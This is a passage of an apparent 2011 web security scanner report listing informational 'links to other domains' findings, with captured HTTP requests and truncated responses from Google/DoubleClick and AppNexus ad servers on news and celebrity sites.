Date: Sat, 17 Sep 2011 01:01:03 GMT
Server: cafe
Cache-Control: private
Content-Length: 5943
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#006699}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://bostonherald.com/news/columnists/view.bg%253Farticleid%253D1366212%26hl%3Den%26client%3Dca-pub-1030395994297178%26adU%3DAARP.org%26adT%3DRobert%2BCulp%2BDies%2BAt%2B79%26adU%3Dwww.Gifts.com%26adT%3DPolice%2BExam%26gl%3DUS&amp;usg=AFQjCNEQMonOn4rSvounbEDXXkDeJtDd-Q" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...

17.89. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1030395994297178&output=html&h=240&slotname=3904971778&w=120&lmt=1316257314&flash=10.3.183&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1&dt=1316239313233&bpp=70&shv=r20110907&jsv=r20110914&prev_slotnames=8490313844&correlator=1316239313230&frm=4&adk=680252388&ga_vid=611537932.1316021623&ga_sid=1316239291&ga_hid=609185102&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=10&adx=880&ady=861&biw=1071&bih=870&eid=36887102&ref=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=2&dtd=1520&xpc=vDaOBeY0ls&p=http%3A//bostonherald.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:00:29 GMT
Server: cafe
Cache-Control: private
Content-Length: 6961
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#006699}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://bostonherald.com/news/regional/view.bg%253Farticleid%253D1366356%2526position%253D1%26hl%3Den%26client%3Dca-pub-1030395994297178%26adU%3Dwww.sportshouting.com%26adT%3DSportShouting.com%26adU%3DSpokeo.com/Reveal-Cheaters%26adT%3DIs%2BHe%2BA%2BCheater%253F%26gl%3DUS&amp;usg=AFQjCNGh-1FFvES6DOLJI4E3e7oBJ2AI7A" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...

17.90. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1030395994297178&output=html&h=280&slotname=8490313844&w=336&lmt=1316257451&flash=10.3.183&url=http%3A%2F%2Fbostonherald.com%2Ftrack%2Fstar_tracks%2Fview%2F20110915cameron_and_tyler_winklevoss_to_star_in_tv_ad%2Fsrvc%3Dtrack%26position%3Dalso&dt=1316239451796&bpp=93&shv=r20110907&jsv=r20110914&correlator=1316239451900&frm=4&adk=1829132337&ga_vid=611537932.1316021623&ga_sid=1316239291&ga_hid=1847642670&ga_fc=1&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&adx=77&ady=693&biw=1071&bih=870&eid=36887102&ref=http%3A%2F%2Fbostonherald.com%2Ftrack%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=621&xpc=Ynva4yyPOn&p=http%3A//bostonherald.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:02:46 GMT
Server: cafe
Cache-Control: private
Content-Length: 26029
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#006699}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://bostonherald.com/track/star_tracks/view/20110915cameron_and_tyler_winklevoss_to_star_in_tv_ad/srvc%253Dtrack%2526position%253Dalso%26hl%3Den%26client%3Dca-pub-1030395994297178%26adU%3Dwww.apps.facebook.com/BeKnown%26adT%3DBeKnown%25E2%2584%25A2%2BApp%2Bon%2BFacebook%26adU%3Dwww.Google.com/AdWords%26adT%3DFree%2BOnline%2BAdvertising%26adU%3DFacebook.com/Sony%26adT%3DSony%2Bmake.believe%26adU%3Dwww.BP.com/GulfOfMexicoResponse%26adT%3DBP%2526%252339%253Bs%2BWork%2Bin%2Bthe%2BGulf%26gl%3DUS&amp;usg=AFQjCNGQ-UVhKbriQH4xHFOXM0PP69vOxQ" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

17.91. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1030395994297178&output=html&h=250&slotname=7623399685&w=300&lmt=1316257499&flash=10.3.183&url=http%3A%2F%2Fbostonherald.com%2Ftrack%2F&dt=1316239499681&bpp=125&shv=r20110907&jsv=r20110914&correlator=1316239499817&frm=4&adk=221221083&ga_vid=611537932.1316021623&ga_sid=1316239291&ga_hid=636303421&ga_fc=1&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=0&biw=1071&bih=870&eid=36887101&ref=http%3A%2F%2Fbostonherald.com%2Ftrack%2Fstar_tracks%2Fview%2F20110915cameron_and_tyler_winklevoss_to_star_in_tv_ad%2Fsrvc%3Dtrack%26position%3Dalso&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=808&xpc=CCxvNz9P3v&p=http%3A//bostonherald.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:03:34 GMT
Server: cafe
Cache-Control: private
Content-Length: 13688
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#b47b10}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://bostonherald.com/track/%26hl%3Den%26client%3Dca-pub-1030395994297178%26adU%3Dwww.bp.com%26adT%3DBP%2526%252339%253Bs%2BWork%2Bin%2Bthe%2BGulf%26adU%3DSportsManagement.lu-online.com%26adT%3DSports%2BManagement%2BDegree%26adU%3Dwww.ClassesUSA.com%26adT%3DTop%2B2011%2BOnline%2BGrants%26adU%3Dpepperdine.edu/masters-technology%26adT%3DMasters%2Bin%2BEDU%2BTechnology%26gl%3DUS&amp;usg=AFQjCNEfSIT-MGO3-bLXzOhIALv-BhTIfQ" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

17.92. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1030395994297178&output=html&h=280&slotname=8490313844&w=336&lmt=1316257700&flash=10.3.183&url=http%3A%2F%2Fbostonherald.com%2Ftrack%2Finside_track%2Fview%2F20110907sox_with_heels%2F&dt=1316239699915&bpp=60&shv=r20110907&jsv=r20110914&correlator=1316239700252&frm=4&adk=1829132337&ga_vid=611537932.1316021623&ga_sid=1316239291&ga_hid=1496789190&ga_fc=1&u_tz=-300&u_his=15&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&biw=1071&bih=870&eid=36887101&ref=http%3A%2F%2Fbostonherald.com%2Ftrack%2Finside_track%2Fview.bg%3Farticleid%3D1366225%26srvc%3Dtrack%26position%3D2&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=1091&xpc=hcjkMq0C8V&p=http%3A//bostonherald.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:06:54 GMT
Server: cafe
Cache-Control: private
Content-Length: 13832
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#006699}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://bostonherald.com/track/inside_track/view/20110907sox_with_heels/%26hl%3Den%26client%3Dca-pub-1030395994297178%26adU%3DBigCommerce.com/OnlineShoppingCart/%26adT%3DEasy%2BOnline%2BShopping%2BCart%26adU%3Dgoldmansachs.com/progress%26adT%3DThe%2BYES%2BNetwork%2BStory%26adU%3Dwww.AceTicket.com%26adT%3DBoston%2BRed%2BSox%2BTickets%26adU%3DAMIClubwear.com%26adT%3DCheap%2BSexy%2BShoes%2B(Sale)%26gl%3DUS&amp;usg=AFQjCNFOhjkDHjaQeAkMzegxCu-h2lZFPg" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

17.93. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1030395994297178&output=html&h=280&slotname=8490313844&w=336&lmt=1316257657&flash=10.3.183&url=http%3A%2F%2Fbostonherald.com%2Ftrack%2Finside_track%2Fview.bg%3Farticleid%3D1366225%26srvc%3Dtrack%26position%3D2&dt=1316239657736&bpp=122&shv=r20110907&jsv=r20110914&correlator=1316239657860&frm=4&adk=1829132337&ga_vid=611537932.1316021623&ga_sid=1316239291&ga_hid=1801771727&ga_fc=1&u_tz=-300&u_his=13&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&biw=1071&bih=870&eid=36887101&ref=http%3A%2F%2Fbostonherald.com%2Ftrack%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=1703&xpc=8yo6JaOwga&p=http%3A//bostonherald.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:06:13 GMT
Server: cafe
Cache-Control: private
Content-Length: 13631
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#006699}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://bostonherald.com/track/inside_track/view.bg%253Farticleid%253D1366225%2526srvc%253Dtrack%2526position%253D2%26hl%3Den%26client%3Dca-pub-1030395994297178%26adU%3Dwww.artinstitutes.edu%26adT%3DEarn%2BYour%2BFashion%2BDegree%26adU%3DYouTube.com/LiveRunway%26adT%3DFashion%2BWeek%2BSpring%2B2012%26adU%3Dwww.bloomspot.com/Boston%26adT%3DBoston%2526%252339%253Bs%2BTop%2BRestaurants%26adU%3Dwww.AceTicket.com%26adT%3DRed%2BSox%2BTickets%2Bfor%2BSale%26gl%3DUS&amp;usg=AFQjCNH_9Y8YJlXQrRb4tZYQzMT8YfuTLg" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

17.94. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:50:35 GMT
Server: cafe
Cache-Control: private
Content-Length: 3836
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.toofab.com/%26hl%3Den%26client%3Dca-pub-7832112837345590%26adU%3Dwww.shoppevonia.com/Free-Shipping%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEvjoYuoCwcW8BgOA6P99v6k-5ISQ" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js"></script>
...[SNIP]...

17.95. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256953&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F&dt=1316238953086&bpp=52&shv=r20110907&jsv=r20110914&correlator=1316238953178&frm=4&adk=974859732&ga_vid=563675983.1316238953&ga_sid=1316238953&ga_hid=1468752110&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&biw=1071&bih=870&eid=36887101&ref=http%3A%2F%2Fwww.tmz.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=312&xpc=AZ4D7RBXS0&p=http%3A//www.tmz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:54:28 GMT
Server: cafe
Cache-Control: private
Content-Length: 4190
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/%26hl%3Den%26client%3Dca-pub-7832112837345590%26adU%3Dwww.Facebook.com/BuxomCosmetics%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNG7VnP7kz5nWfztR-yFztp-EtTkuA" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js"></script><iframe style="display:none" src="http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html"></iframe>
...[SNIP]...

17.96. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316257131&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2Fsignin%2F&dt=1316239131640&bpp=10&shv=r20110907&jsv=r20110914&correlator=1316239131660&frm=4&adk=1363316846&ga_vid=1986127593.1316239132&ga_sid=1316239132&ga_hid=1800675763&ga_fc=0&u_tz=-300&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&biw=1087&bih=870&eid=36887101&ref=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%2F%3Fadid%3Dhero1&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=102&xpc=Chu0s9fqA2&p=http%3A//www.tmz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:57:26 GMT
Server: cafe
Cache-Control: private
Content-Length: 4345
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.tmz.com/signin/%26hl%3Den%26client%3Dca-pub-7832112837345590%26adU%3Dwww.Facebook.com/BuxomCosmetics%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHRfLnmdFPz2M6w9pnRMGcEtO00ig" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js"></script>
...[SNIP]...

17.97. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ptj?member=514&size=300x250&referrer=http://www.tmz.com/&inv_code=2298003&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D2298003%26r%3D1%26_salt%3D1775927586%26u%3Dhttp%253A%252F%252Fwww.tmz.com%252F%26u%3Dhttp%3A%2F%2Fwww.tmz.com%2F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; sess=1; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 00:52:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-17; path=/; expires=Fri, 16-Dec-2011 00:52:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII2IgDEAoYCyALKAsw497P8wQQ497P8wQYCg..; path=/; expires=Fri, 16-Dec-2011 00:52:51 GMT; domain=.adnxs.com; HttpOnly
